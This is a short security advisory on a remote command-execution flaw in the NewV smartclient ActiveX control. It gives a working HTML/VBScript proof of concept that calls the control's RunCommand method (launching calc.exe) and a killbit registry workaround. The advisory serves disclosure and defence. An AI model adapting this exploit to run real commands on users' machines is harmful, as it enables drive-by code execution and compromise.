Vendor: NewV ( http:// www.newv.com.cn/ ) Product: NewV smartclient (http://demo.newv.com.cn/lds/module/smartclientsetting.exe) Vulnerable Version: 1.0.0.18 Status: Not Fixed, Vendor Alerted Risk level: High Credit: Yu Guo(yuguo.cn#gmail.com) Description: An input validation issue exists in the NewV ActiveX Control. The Runcommand attribute may allow attacker to run arbitrary command remotely. POC: <html> <head> <script language='vbscript'> arg1 = "calc.exe" </script> </head> <object classid='clsid:0B68B7EB-02FF-4A41-BC14-3C303BB853F9' id='target' /> </object> <script language='vbscript'> target.RunCommand arg1 </script> </html> Workaround: Set the Killbit for NewV CLSID?s: {0B68B7EB-02FF-4A41-BC14-3C303BB853F9} .Reg file: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\ActiveX Compatibility\{0B68B7EB-02FF-4A41-BC14-3C303BB853F9}] "Compatibility Flags"=dword:00000400 -EOF-
